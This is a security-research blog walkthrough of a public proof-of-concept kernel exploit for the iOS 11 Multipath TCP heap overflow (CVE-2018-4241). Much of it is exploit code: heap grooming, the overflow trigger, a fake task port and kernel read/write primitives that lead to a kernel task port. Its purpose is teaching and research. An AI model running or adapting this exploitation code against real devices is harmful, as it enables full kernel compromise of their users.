2018-07-19

Exploiting iOS 11.0-11.3.1 Multi-path-TCP: A walk through

by Ian Fang @fongtinyik, Qoobee @Qooobeee

Introduction

The iOS 11 mptcp bug (CVE-2018-4241) discovered by Ian Beer is a serious kernel vulnerability which involves a buffer overflow in mptcp_usr_connectx that allows attackers to execute arbitrary code in a privileged context.

Ian Beer attached an interesting piece of PoC code which demonstrated a rather elegant technique to obtain the kernel task port with this vulnerability. Extending the brief writeup that comes with the PoC, this blog post aims to walk through the PoC in great detail and to cover its background. If you are an iOS security researcher who hasn’t looked into the PoC source code yet, hopefully you will find the material handy when you decide to do so.

Please have a copy of mptcp PoC code before we dive in! You can download it from here: Download

Note: All credits for exploitation techniques, vulnerability PoC code and original writeup belong to Ian Beer at Google Project Zero.

The Vulnerability

Let’s first take a quick look at the offending code in mptcp_usr_connectx(), which is the handler for the connectx syscall for the AF_MULTIPATH socket family:

if (src) {
	// verify sa_len for AF_INET
	if (src->sa_family == AF_INET &&
	    src->sa_len != sizeof(mpte->__mpte_src_v4)) {
		mptcplog((LOG_ERR, "%s IPv4 src len %u\n", __func__,
			  src->sa_len),
			 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
		error = EINVAL;
		goto out;
	}

	// verify sa_len for AF_INET6
	if (src->sa_family == AF_INET6 &&
	    src->sa_len != sizeof(mpte->__mpte_src_v6)) {
		mptcplog((LOG_ERR, "%s IPv6 src len %u\n", __func__,
			  src->sa_len),
			 MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
		error = EINVAL;
		goto out;
	}

	// code doesn't bail if sa_family is neither AF_INET nor AF_INET6
	if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
		memcpy(&mpte->mpte_src, src, src->sa_len);
	}
}

The code does not validate the sa_len field if src->sa_family is neither AF_INET nor AF_INET6, so the function falls straight through to memcpy with a user-specified sa_len value of up to 255 bytes.
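
To make the missing check concrete, here is a minimal sketch of a validator that rejects every address family other than AF_INET and AF_INET6. It is an illustration only and not Apple's actual fix. The name check_src_len is hypothetical, and the length is passed as a separate argument because struct sockaddr does not carry an sa_len field on every platform.

```c
#include <errno.h>
#include <netinet/in.h>
#include <stddef.h>
#include <sys/socket.h>

/* Hypothetical helper: returns 0 if (family, len) is acceptable,
 * EINVAL otherwise. */
static int check_src_len(int family, size_t len)
{
    switch (family) {
    case AF_INET:
        return len == sizeof(struct sockaddr_in) ? 0 : EINVAL;
    case AF_INET6:
        return len == sizeof(struct sockaddr_in6) ? 0 : EINVAL;
    default:
        /* The vulnerable code has no equivalent of this branch, so an
         * unknown family reaches memcpy with an unchecked length. */
        return EINVAL;
    }
}
```

With a check of this shape, a source address whose family is 'B' and whose length is 255 would be refused before any copy takes place.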

Background

Kernel zone heap allocator

To oversimplify a bit, kernel heap memory is divided into zones, and all allocations within one zone are of the same size. For each zone, the kernel keeps four doubly-linked lists that categorize pages by their memory availability, namely:

struct {
  queue_head_t any_free_foreign;  
  queue_head_t all_free;
  queue_head_t intermediate;
  queue_head_t all_used;
} pages;

When a memory allocation is requested, the intermediate page list is traversed before the all_free list, and a free memory block is returned from the first available page.
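
The lookup order can be pictured with a toy model. The sketch below is an assumption-laden simplification: it represents only the two lists named in the sentence above, and toy_page, toy_zone and toy_pick_page are hypothetical names that do not exist in XNU.

```c
#include <stddef.h>

/* Toy model of a zone; only two of the four page lists are represented. */
struct toy_page {
    int free_blocks;            /* blocks still available on this page */
    struct toy_page *next;
};

struct toy_zone {
    struct toy_page *intermediate;  /* partially used pages */
    struct toy_page *all_free;      /* completely free pages */
};

/* Return the page the next allocation would be served from, or NULL. */
static struct toy_page *toy_pick_page(const struct toy_zone *z)
{
    if (z->intermediate != NULL)
        return z->intermediate;     /* tried first */
    return z->all_free;             /* fallback */
}
```

This ordering is why a page that has just had one block freed is a likely source for the next allocation of the same size.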

Preallocated ipc_kmsg buffer

ipc_port has a struct ipc_kmsg *premsg member that points to an optional preallocated ipc_kmsg buffer. The intended use case is to allow user space to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers. In addition, this kernel heap buffer will not be freed after the message gets delivered to user space. Ian Beer uses this fact to increase the stability of the exploit.

Mach exception port

Mach provides an IPC-based exception-handling facility wherein exceptions are converted to messages. A thread or task can register one or more mach ports as so-called “exception ports” to receive information about an exception. When an exception occurs, a message containing information about the exception is sent to the exception port. Combined with a mach port that has a preallocated ipc_kmsg buffer, this lets us force the kernel to send data to a deterministic location in the heap. Furthermore, we can partially control the content of the message by manipulating the register state at the time of the exception, which the kernel dutifully carries over into the message.

For more information about preallocated messages and the exception handling mechanism, readers are advised to check out Ian Beer’s excellent writeup on the iOS 10 extra-recipe bug here, as well as Chapter 9.7 in Amit Singh’s seminal Mac OS X Internals.

Ok, let’s now dig in!

Finding the target

By passing in a src with an unexpected sa_family, we are now able to overflow inside mpte, a mptses structure, with sa_len bytes of attacker-controlled data. Here is the struct declaration in /bsd/netinet/mptcp_var.h:

struct mptses {
	...

	union {
	
		struct sockaddr	mpte_src;  // The field we are overflowing out of
		struct sockaddr_in __mpte_src_v4;
		struct sockaddr_in6 __mpte_src_v6;
	};

	union {
		
		struct sockaddr	mpte_dst;
		struct sockaddr_in __mpte_dst_v4;
		struct sockaddr_in6 __mpte_dst_v6;
	};
  ...

#define	MPTE_ITFINFO_SIZE	4
	uint32_t	mpte_itfinfo_size;
	struct mpt_itf_info	_mpte_itfinfo[MPTE_ITFINFO_SIZE];
	struct mpt_itf_info	*mpte_itfinfo;
  ...
};

Here, the mpte_itfinfo is particularly interesting because it’s a pointer… keep digging in references to mpte_itfinfo… oh snap!

if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
	_FREE(mpte->mpte_itfinfo, M_TEMP);

In mptcp_session_destroy, the address pointed to by mpte_itfinfo is freed, and mpte_itfinfo_size is under our complete control too! Moreover, we don’t need to know a priori the size of the object we would like to _FREE, because kfree_addr() will look up the size from the memory zone struct in which the object resides. (_FREE is just a macro around kfree_addr().)

This is just too good to be true.

Set up the heap

To turn this overflow into something actually useful, it’s time for some heap Feng Shui. The end goal here is to have an ipc_kmsg and a pipe buffer overlapping with each other so that we can write to and read from it. In the PoC, Ian Beer chooses to overwrite the lower 3 bytes of mpte_itfinfo with 0x000000, after which it will point to a 16MB aligned page boundary.
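
The alignment claim is plain arithmetic: three bytes are 24 bits, and 2^24 bytes is 16MB. A minimal sketch follows; clear_low_bytes is a hypothetical helper, and the pointer value used in the note after it is made up for illustration.

```c
#include <stdint.h>

/* Zero the low n_bytes bytes of a 64-bit pointer value (n_bytes in 0..7). */
static uint64_t clear_low_bytes(uint64_t ptr, unsigned n_bytes)
{
    uint64_t mask = (1ULL << (8 * n_bytes)) - 1;
    return ptr & ~mask;
}
```

For example, clear_low_bytes(0xffffffe012345678, 3) yields 0xffffffe012000000, which is a multiple of 0x1000000 (16MB).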

In order to have an ipc_kmsg sitting right at that 16MB boundary, the code alternately allocates 16MB of ipc_kmsgs and a bunch of mptcp sockets in the kernel heap. The former is done by allocating mach ports and sending a mach message of calculated size to each port, during which mach_msg(...MACH_SEND_MSG...) allocates a kernel heap buffer for us and copies the message in from user space. This technique effectively lets us do the same thing as kalloc, but from outside the kernel. We can also control the memory zone the ipc_kmsg lands in: all it takes is to work backward and calculate the msgh_size from the kalloc size we would like to achieve. In the PoC, Ian Beer chose to place the ipc_kmsgs in the kalloc.2048 zone.

// a few times do:
  // alloc 16MB of messages
  // alloc a hundred sockets
  printf("trying to force a 16MB aligned 0x800 kalloc on to freelist\n");
  for (int i = 0; i < 7; i++) {
    printf("%d/6...\n", i);
    for (int j = 0; j < 0x2000; j++) {
      mach_port_t p = fake_kalloc(0x800); // kalloc.2048 zone block size
    }
    for (int j = 0; j < 100; j++) {
      int sock = alloc_mptcp_socket();
      
      // we'll keep two of them:
      if (i == 6 && (j==94 || j==95)) {
        target_socks[next_sock] = sock;
        next_sock++;
        next_sock %= (sizeof(target_socks)/sizeof(target_socks[0]));
      } else {
        sockets[next_all_sock++] = sock;
      }
    }
  }
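
As a quick sanity check on the loop bounds above, 0x2000 allocations of 0x800 bytes add up to exactly 16MB per round. The helper below is a hypothetical one-liner that only does this arithmetic; it ignores any per-allocation overhead inside the kernel.

```c
#include <stdint.h>

/* Total bytes requested by `count` allocations of `block_size` bytes each. */
static uint64_t spray_bytes(uint64_t count, uint64_t block_size)
{
    return count * block_size;
}
```

Seven rounds therefore request 112MB of kalloc.2048 blocks in total, interleaved with 700 mptcp sockets.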

Trigger the bug

The code in do_partial_kfree_with_socket triggers the bug, overwriting the lower 3 bytes of mpte_itfinfo with zero bytes. Let’s hope the heap now looks somewhat like the diagram shown below. Fingers crossed! 🤞

void do_partial_kfree_with_socket(int fd, uint64_t kaddr, uint32_t n_bytes) {
  struct sockaddr* sockaddr_src = malloc(256);
  memset(sockaddr_src, 'D', 256);
  *(uint64_t*) (((uint8_t*)sockaddr_src)+koffset(KFREE_ADDR_OFFSET)) = kaddr;
  sockaddr_src->sa_len = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  sockaddr_src->sa_family = 'B'; // An abnormal sa_family 
  
  struct sockaddr* sockaddr_dst = malloc(256);
  memset(sockaddr_dst, 'C', 256);
  sockaddr_dst->sa_len = sizeof(struct sockaddr_in6);
  sockaddr_dst->sa_family = AF_INET6;
  
  sa_endpoints_t eps = {0};
  eps.sae_srcif = 0;
  eps.sae_srcaddr = sockaddr_src;
  eps.sae_srcaddrlen = koffset(KFREE_ADDR_OFFSET)+n_bytes;
  eps.sae_dstaddr = sockaddr_dst;
  eps.sae_dstaddrlen = sizeof(struct sockaddr_in6);
  
  printf("doing partial overwrite with target value: %016llx, length %d\n", kaddr, n_bytes);
  
  int err = connectx(
                     fd,
                     &eps,
                     SAE_ASSOCID_ANY,
                     0,
                     NULL,
                     0,
                     NULL,
                     NULL);

  
  printf("err: %d\n", err);
  
  close(fd); // Trigger the _FREE, but need to wait for mptcp_gc
  
  
  return;
}

After we point mpte_itfinfo to the 16MB boundary, we can trigger the _FREE by simply closing the socket.
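
The partial overwrite itself can be simulated in user space. The sketch below assumes a little-endian machine and a made-up distance of 0x40 bytes between the copy destination and the pointer; the real distance comes from koffset(KFREE_ADDR_OFFSET) and is not stated here. All toy_ names are hypothetical.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical distance from the start of the copy to the pointer field. */
#define TOY_PTR_OFFSET 0x40

/* Fill payload (at least TOY_PTR_OFFSET + 8 bytes) the way the PoC fills
 * sockaddr_src, and return the number of bytes that should be copied. */
static size_t toy_build_payload(uint8_t *payload, uint64_t kaddr, uint32_t n_bytes)
{
    memset(payload, 'D', TOY_PTR_OFFSET + sizeof(kaddr));
    memcpy(payload + TOY_PTR_OFFSET, &kaddr, sizeof(kaddr));
    return TOY_PTR_OFFSET + n_bytes;
}

/* Model of the unchecked memcpy: copy len bytes over the victim and
 * return the pointer value that ends up stored at TOY_PTR_OFFSET. */
static uint64_t toy_overflow(uint8_t *victim, const uint8_t *payload, size_t len)
{
    uint64_t ptr;
    memcpy(victim, payload, len);
    memcpy(&ptr, victim + TOY_PTR_OFFSET, sizeof(ptr));
    return ptr;
}
```

Because the copy stops n_bytes into the pointer, only its least significant bytes are replaced and the upper bytes keep whatever the kernel stored there. The total length must also stay within the 255 bytes that a one-byte sa_len can express.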

One caveat is that we need to wait for mptcp_gc, because mpte_itfinfo is not _FREE’ed immediately after the socket is closed, as is evident from the comment on this function in /xnu-4570.41.2/bsd/netinet/mptcp_subr.c:

/*
 * MPTCP garbage collector.
 *
 * This routine is called by the MP domain on-demand, periodic callout,
 * which is triggered when a MPTCP socket is closed.  The callout will
 * repeat as long as this routine returns a non-zero value.
 */
static uint32_t
mptcp_gc(struct mppcbinfo *mppi)
{
...
    mptcp_session_destroy(mpte); // mpte_itfinfo is _FREE'ed here
...
    return (active);
}

printf("waiting for second mptcp gc...\n");
// wait for the mptcp gc...
for (int i = 0; i < 400; i++) {
  usleep(10000);
}

After the _FREE, hopefully one of the ipc_kmsgs has been freed and its page put on the intermediate list.

Allocate pipes

Next, we allocate a bunch of pipes and write 2047 bytes of data to the write end of each. The backing buffers for these pipes will come from kalloc.2048, hopefully including our 16MB-aligned address.
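
A minimal user-space sketch of this step is shown below. It covers only the POSIX side (create a pipe, fill it with a known pattern) and makes no claim about how the kernel sizes the backing buffer. The names make_filled_pipe and SKETCH_PIPE_SIZE are hypothetical, and the 'B' fill pattern is the one the PoC later checks for.

```c
#include <stdint.h>
#include <string.h>
#include <unistd.h>

#define SKETCH_PIPE_SIZE 2047   /* bytes written per pipe, per the text */

/* Create a pipe and fill it with 'B' bytes.
 * fds[0] is the read end, fds[1] the write end.
 * Returns 0 on success, -1 on failure. */
static int make_filled_pipe(int fds[2])
{
    uint8_t buf[SKETCH_PIPE_SIZE];
    memset(buf, 'B', sizeof(buf));

    if (pipe(fds) != 0)
        return -1;

    if (write(fds[1], buf, sizeof(buf)) != (ssize_t)sizeof(buf)) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    return 0;
}
```

Calling this in a loop and keeping every pair of descriptors gives a set of pipes whose contents can later be read back and compared against the pattern.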

Trigger the bug again

We trigger the bug a second time to _FREE the underlying pipe buffer, which puts the page on the intermediate page list again.

After overflow:

After _FREE:

Allocate more mach ports!

Next, we allocate a bunch of mach ports with preallocated ipc_kmsg buffers using mach_port_allocate_full(), passing in the size as a member of the mach_port_qos_t parameter. The desired size for the preallocated buffer is 2048 bytes so that it is placed in the kalloc.2048 zone; hopefully one of them picks up the space we just _FREE’ed.

We then insert a SEND RIGHT to every mach port we allocated in this step, as each one will be registered as another thread’s exception port later.

Catching the pipe

As shown on the diagram above, ideally now we have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write) overlapping each other.

We now need to find out which one of the hundreds of pipes we allocated a while ago is on that spot.

int find_replacer_pipe(void** contents) {
  uint64_t* read_back = malloc(PIPE_SIZE);
  for (int i = 0; i < next_read_fd; i++) {
    int fd = read_fds[i];
    ssize_t amount = read(fd, read_back, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    } else {
      printf("full read\n");
    }
    
    int pipe_is_replacer = 0;
    for (int j = 0; j < PIPE_SIZE/8; j++) {
      if (read_back[j] != 0x4242424242424242) { // Is the content still "BBBBBBBB"?
        pipe_is_replacer = 1;
        printf("found an unexpected value: %016llx\n", read_back[j]);
      }
    }
    
    if (pipe_is_replacer) {
      *contents = read_back;
      return fd;
    }
  }
  return -1;
}

The technique Ian Beer used here is simply to read from each pipe and compare the content read with the original data we piped into the buffer, BBBBBBBB (0x4242424242424242 in hex). If they differ, the underlying buffer has been overwritten by a newly allocated ipc_kmsg.

If we can’t find a pipe satisfying this condition, it simply means there is no overlap, and we just have to restart and wish ourselves better luck next time.

Catching the port

Now, we need to figure out which port owns the preallocated ipc_kmsg buffer. To do that, we need to somehow persuade the kernel into overwriting the preallocated kmsg with something different, so that we can compare the content again and spot the difference.

Ian Beer’s technique in the PoC is to register each port as an exception port for a thread and intentionally raise an exception on that thread, causing the kernel to send a kmsg to the buffer, and then to immediately compare the content by reading from the pipe. This is ingenious.

for (int i = 0; i < 100; i++) {
    send_prealloc_msg(exception_ports[i]);
    // read from the pipe and see if the contents changed:

Let’s walk through send_prealloc_msg() step by step.

1. Start a thread

pthread_create(&t, NULL, do_thread, (void*)port);

2. Register exception port

void* do_thread(void* arg) {
  mach_port_t exception_port = (mach_port_t)arg;
  
  kern_return_t err;
  err = thread_set_exception_ports(
                                   mach_thread_self(),
                                   EXC_MASK_ALL,
                                   exception_port,
                                   EXCEPTION_STATE_IDENTITY, // catch_exception_raise_state_identity messages
                                   ARM_THREAD_STATE64);

3. Substitute thread port with a host port

  // make the thread port which gets sent in the message actually be the host port
  err = thread_set_special_port(mach_thread_self(), THREAD_KERNEL_PORT, mach_host_self());

4. Crash the thread

// cause an exception message to be sent by the kernel
  volatile char* bAAAAd_ptr = (volatile char*)0x41414141;
  *bAAAAd_ptr = 'A';
// Now the thread is crashed

After the thread crashes, a message containing the exception information is sent to our ipc_kmsg buffer, waiting to be received and processed by the port. We can now read from the pipe and compare the content.

ssize_t amount = read(replacer_pipe, new_contents, PIPE_SIZE);
    if (amount != PIPE_SIZE) {
      printf("short read (%ld)\n", amount);
    }
    if (memcmp(original_contents, new_contents, PIPE_SIZE) == 0) {
      // they are still the same, this isn't the correct port:
      ...
    } else {
      // different! we found the right exception port which has its prealloced port overlapping
      replacer_port = exception_ports[i];

      break;
    }
  }

At this point, we have fully discovered the overlapping pipe, port pair.

We also need to save the kernel address for the host port and our task port for later:

// We will get kernel ipc_space address from this later
uint64_t host_port_kaddr = *((uint64_t*)(new_contents + 0x66c));

// Need this for cleaning up mach port table
uint64_t task_port_kaddr = *((uint64_t*)(new_contents + 0x67c));
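
Note that 0x66c and 0x67c are not multiples of 8, so the casts above perform unaligned 64-bit loads. That works on arm64, but a memcpy-based accessor is the portable way to express the same read. The helpers below are a hypothetical sketch and are not part of the PoC.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Read a 64-bit value at an arbitrary (possibly unaligned) byte offset. */
static uint64_t read_u64_at(const uint8_t *buf, size_t off)
{
    uint64_t v;
    memcpy(&v, buf + off, sizeof(v));
    return v;
}

/* Write a 64-bit value at an arbitrary (possibly unaligned) byte offset. */
static void write_u64_at(uint8_t *buf, size_t off, uint64_t v)
{
    memcpy(buf + off, &v, sizeof(v));
}
```

With these, the host port address would be read as read_u64_at(new_contents, 0x66c), assuming new_contents is a byte pointer.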

Build fake task port

Before we receive the exception message into user space, we want to build a fake task port to allow early arbitrary kernel reads.

build_fake_task_port(original_contents+fake_port_offset, fake_port_kaddr, early_read_pipe_buffer_kaddr, 0, 0);

We can do this by mimicking the structure of a proper task port:

#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_NONE 0

void build_fake_task_port(uint8_t* fake_port, uint64_t fake_port_kaddr, uint64_t initial_read_addr, uint64_t vm_map, uint64_t receiver) {
  // clear the region we'll use:
  memset(fake_port, 0, 0x500);
  
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK;
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references
  *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef;
  
  
  uint64_t fake_task_kaddr = fake_port_kaddr + 0x100;
  *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_kaddr;
  
  ...
}

We then shove the fake port into our ipc_kmsg buffer through our replacer_pipe:

// the thread port is at +66ch
  // we could parse the kmsg properly, but this'll do...
  // replace the thread port pointer with one to our fake port:
  *((uint64_t*)(original_contents+0x66c)) = fake_port_kaddr;
  
  // replace the ipc_kmsg:
  write(pipe_write_end, original_contents, PIPE_SIZE);

We can read off the kernel address of our buffer from the next field, which points back to the buffer itself given it is the only ipc_kmsg in the queue.

uint64_t pipe_buf = *((uint64_t*)(new_contents + 0x8));

Let’s zoom into our ipc_kmsg buffer to observe the change.

Now, the thread_port points to our fake task port! Mission accomplished!

Note: Here, in this particular PoC, *thread_port actually points to a host port because in Step 3 of the previous section, we substitute the thread port with host port. By doing this, we have a leaked host port kernel address, which can be used to obtain kernel’s ipc_space later. We will cover this shortly.

Receive the exception message

User space programs can receive the exception message by a callout to system exception server, exc_server, after which various port rights in the ipc_kmsg will be inserted into calling task’s ipc_space, including our fake task port’s send right (which is really supposed to be a thread port).

We can now simply extract the port name to the fake port from the exception handler callback, from the thread argument:

kern_return_t catch_exception_raise_state_identity
(
 mach_port_t exception_port,
 mach_port_t thread,
 mach_port_t task,
 exception_type_t exception,
 exception_data_t code,
 mach_msg_type_number_t codeCnt,
 int *flavor,
 thread_state_t old_state,
 mach_msg_type_number_t old_stateCnt,
 thread_state_t new_state,
 mach_msg_type_number_t *new_stateCnt
 )
{
  printf("catch_exception_raise_state_identity\n");
  
    
    
  // the thread port isn't actually the thread port
  // we rewrote it via the pipe to be the fake kernel r/w port
  printf("thread: %x\n", thread);
  extracted_thread_port = thread;
  
  mach_port_deallocate(mach_task_self(), task);
  
  // make the thread exit cleanly when it resumes:
  memcpy(new_state, old_state, sizeof(_STRUCT_ARM_THREAD_STATE64));
  _STRUCT_ARM_THREAD_STATE64* new = (_STRUCT_ARM_THREAD_STATE64*)(new_state);
  
  *new_stateCnt = old_stateCnt;
  
  new->__pc = (uint64_t)pthread_exit;
  new->__x[0] = 0;
  
  // let the thread resume and exit
  return KERN_SUCCESS;
}

At this point, we have successfully inserted a fake task port into our task’s ipc_space. Isn’t this ingenious?

Build early kernel read primitive

With the fake task port we can build an early kernel read primitive by using pid_for_task().

Given a valid task port, pid_for_task() simply gets a task pointer from the port’s ip_kobject, dereferences it to retrieve the proc pointer from the task’s bsd_info, then dereferences the proc struct to get the pid. Since all it does is some pointer arithmetic and dereferencing, we can create a fake task struct inside the ipc_kmsg we control, work backward and place the kernel address we would like to read at the correct offset.

uint8_t* fake_task = fake_port + 0x100;

// set the bsd_info pointer to be 0x10 bytes before the desired initial read:
*(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO)) = initial_read_addr - 0x10;

With every call to early_rk32, we just need to rebuild the task port, fixing up the bsd_info pointer accordingly.

Here, unsurprisingly, 0x10 is just the offset of the p_pid field inside struct proc, as is evident in proc_internal.h:

struct	proc {
	LIST_ENTRY(proc) p_list;	// Just two pointers, so size 0x10

	pid_t		p_pid;			// Offset 0x10
	void * 		task;	
...
};

The drawback of this technique is that the read is limited to 32 bits, which is the size of a pid_t.
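
The read primitive can be modeled entirely in user space. The sketch below is a simulation, not the PoC's early_rk32: toy_pid_for_task stands in for the kernel's pointer chase, the struct layouts are stand-ins, and only the 0x10 offset of p_pid is taken from the text. The 64-bit variant composed of two 32-bit reads is an assumption about how such a helper could be built, and it assumes a little-endian machine.

```c
#include <stdint.h>
#include <string.h>

#define TOY_P_PID_OFFSET 0x10   /* offset of p_pid in struct proc, per the text */

struct toy_task { uintptr_t bsd_info; };        /* stand-in for the fake task */
struct toy_port { struct toy_task *kobject; };  /* stand-in for the fake port */

/* Mimics the pointer chase: port -> task -> proc -> pid. */
static uint32_t toy_pid_for_task(const struct toy_port *port)
{
    uint32_t pid;
    const void *p = (const void *)(port->kobject->bsd_info + TOY_P_PID_OFFSET);
    memcpy(&pid, p, sizeof(pid));
    return pid;
}

/* 32-bit read: aim bsd_info so that the "pid" field lands on addr. */
static uint32_t toy_rk32(struct toy_port *port, const void *addr)
{
    port->kobject->bsd_info = (uintptr_t)addr - TOY_P_PID_OFFSET;
    return toy_pid_for_task(port);
}

/* 64-bit read built from two 32-bit reads (little-endian assumed). */
static uint64_t toy_rk64(struct toy_port *port, const void *addr)
{
    uint64_t lo = toy_rk32(port, addr);
    uint64_t hi = toy_rk32(port, (const uint8_t *)addr + 4);
    return lo | (hi << 32);
}
```

In the real exploit the pointer rewrite happens by rewriting the fake task through the pipe, and the dereference is performed by the kernel on our behalf.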

Build full kernel read/write primitive

Notice that the struct ipc_space *receiver field in our fake port and the address space description, vm_map_t map, in our fake task are still missing. We can achieve full kernel read/write by filling in the addresses of ipc_space_kernel and the kernel task’s vm_map.

We can get the kernel ipc_space from the host port we obtained a while ago, with a known offset:

// receiver field
uint64_t ipc_space_kernel = early_rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER));

However, kernel’s vm_map is a bit trickier to get.

Ian Beer’s approach takes the following steps:

1. Find the kernel task port on the heap
2. Get the kernel’s task from the task port
3. Get the vm_map from the kernel task

To find the kernel task port on the heap, we search in the vicinity of the host port for anything that looks like a task port and get the kernel task vm_map from it:

// now look through up to 0x4000 of ports and find one which looks like a task port:
  for (int i = 0; i < (0x4000/0xa8); i++) {
    uint64_t early_port_kaddr = first_port + (i*0xa8);
    uint32_t io_bits = early_rk32(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS));
    
    if (io_bits != (IO_BITS_ACTIVE | IKOT_TASK)) {
      continue;
    }
    
    // get that port's kobject:
    uint64_t task_t = early_rk64(early_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
    if (task_t == 0) {
      printf("weird heap object with NULL kobject\n");
      continue;
    }
    
    // check the pid via the bsd_info:
    uint64_t bsd_info = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
    if (bsd_info == 0) {
      printf("task doesn't have a bsd info\n");
      continue;
    }
    uint32_t pid = early_rk32(bsd_info + koffset(KSTRUCT_OFFSET_PROC_PID));
    if (pid != 0) {
      printf("task isn't the kernel task\n");
      continue; // keep scanning, otherwise any task port would be accepted
    }
    
    // found the right task, get the vm_map
    kernel_vm_map = early_rk64(task_t + koffset(KSTRUCT_OFFSET_TASK_VM_MAP));
    break;
  }
  
  if (kernel_vm_map == 0) {
    printf("unable to find the kernel task map\n");
    return;
  }

printf("kernel map:%016llx\n", kernel_vm_map);
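
The scan pattern can be tried out on an ordinary byte buffer. In the sketch below, the 0xa8 stride and the io_bits value come from the listing above, while placing io_bits at offset 0 of each slot is an assumption made for the toy, and toy_find_task_port is a hypothetical name. The real loop goes on to check the kobject, bsd_info and pid, which this sketch omits.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define IO_BITS_ACTIVE     0x80000000u
#define IKOT_TASK          2u
#define TOY_PORT_SIZE      0xa8   /* stride used by the loop in the text */
#define TOY_IO_BITS_OFFSET 0      /* assumed offset of io_bits in a slot */

/* Return the index of the first slot whose io_bits mark an active task
 * port, or -1 if no slot matches. */
static int toy_find_task_port(const uint8_t *heap, size_t heap_len)
{
    size_t slots = heap_len / TOY_PORT_SIZE;
    for (size_t i = 0; i < slots; i++) {
        uint32_t io_bits;
        memcpy(&io_bits, heap + i * TOY_PORT_SIZE + TOY_IO_BITS_OFFSET,
               sizeof(io_bits));
        if (io_bits == (IO_BITS_ACTIVE | IKOT_TASK))
            return (int)i;
    }
    return -1;
}
```

A 0x4000-byte window holds 97 whole slots of 0xa8 bytes, which matches the loop bound 0x4000/0xa8.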

After inserting what we just found into our fake port and fake task, we finally get a fully functional, but “fake”, tfp0. Hooray!

Have fun now with your freshly baked tfp0!

Reference

XNU kernel heap overflow due to bad bounds checking in MPTCP, Ian Beer
Exception-based exploitation on iOS, Ian Beer
CVE-2018-4241, Common Vulnerabilities and Exposures
Mac OS X Internals - A System Approach, Amit Singh
*OS Internals: Volume III Security & Insecurity, Jonathan Levin